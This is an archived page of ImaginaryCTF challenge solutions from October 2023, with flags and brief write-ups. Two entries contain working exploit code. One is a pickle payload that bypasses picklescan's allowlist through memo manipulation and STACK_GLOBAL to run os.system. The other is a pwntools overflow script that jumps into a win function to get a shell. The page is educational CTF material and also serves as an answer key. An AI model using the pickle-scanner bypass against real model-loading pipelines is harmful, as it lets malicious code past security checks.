Archived Challenges - October 2023

Submit the flag.

ictf{welcome_to_round39_sanity_check}

The way picklescan handles memo doesn't look at the argument, so it is possible to have a different memo and use STACK_GLOBAL to bypass allowlist checking.

import pickle, base64

pkl = b''.join([
    pickle.UNICODE + b'os\n',
    pickle.PUT + b'2\n',
    pickle.POP,
    pickle.UNICODE + b'system\n',
    pickle.PUT + b'3\n',
    pickle.POP,
    pickle.UNICODE + b'torch\n',
    pickle.PUT + b'0\n',
    pickle.POP,
    pickle.UNICODE + b'LongStorage\n',
    pickle.PUT + b'1\n',
    pickle.POP,

    pickle.GET + b'2\n',
    pickle.GET + b'3\n',
    pickle.STACK_GLOBAL,

    pickle.MARK,
    pickle.UNICODE + b'cat flag.txt\n',
    pickle.TUPLE,

    pickle.REDUCE
]) + b'.'
print(base64.b64encode(pkl).decode())

ictf{what_about_not_using_pickle_in_the_first_place?}

first number: 1j, second number: doesn't really matter as long as you use a number I believe with the two character restriction, imaginary/complex numbers are the only way to solve it.

ictf{an_imaginary_number_challenge_for_an_imaginary_ctf}

https://gchq.github.io/CyberChef/#recipe=ROT47(145)&input=aWN0ZntqdXN0X2Ffbm9ybWFsX2NhZXNhcl9zaGlmdF8xYWIzOTEyNH0

ictf{just_a_normal_caesar_shift_1ab39124}

https://imaginaryctf.org/f/wJFR9#solve.py

ictf{berlekamp_massey_op_ab089546eab4f0b99c8666c7}

z3, because I am tired and can't math right now... https://imaginaryctf.org/f/OUEnv#solve.py

ictf{did_caesar_really_know_crypto}

https://cdn.discordapp.com/attachments/732682111462539276/1163711053331447828/solve.py

ictf{perhaps_the_best_argument_is_a_controlled_argument}

Jump to the middle of the win function to get to the system call that spawns a shell. The address is 0x40128d.

from pwn import *

context.binary = elf = ELF("./vuln")
rop = ROP(elf)
libc = ELF("./libc.so.6")
conn = process()

payload = b"a"*72
payload += p64(0x40128d)
conn.sendline(payload)
conn.interactive()```

ictf{jumping_to_the_m1ddle_of_functions_is_fUn}

There's a "logic flaw": groups of 7+ free chunks don't get cleared. Use that to UAF and target something. I used the libc GOT.

https://imaginaryctf.org/f/veUnv#solve.py

ictf{seriously_why_did_they_remove_the_hooks}

https://cdn.discordapp.com/attachments/732682111462539276/1163714906181349436/writeup.md

ictf{beaming_w1th_j0y_e65cb560}

The challenge XORs the input with 45, multiplies each number by 7, and adds 92.

ictf{h4sk3ll_r3v_0r_instruCtion_c0unt?}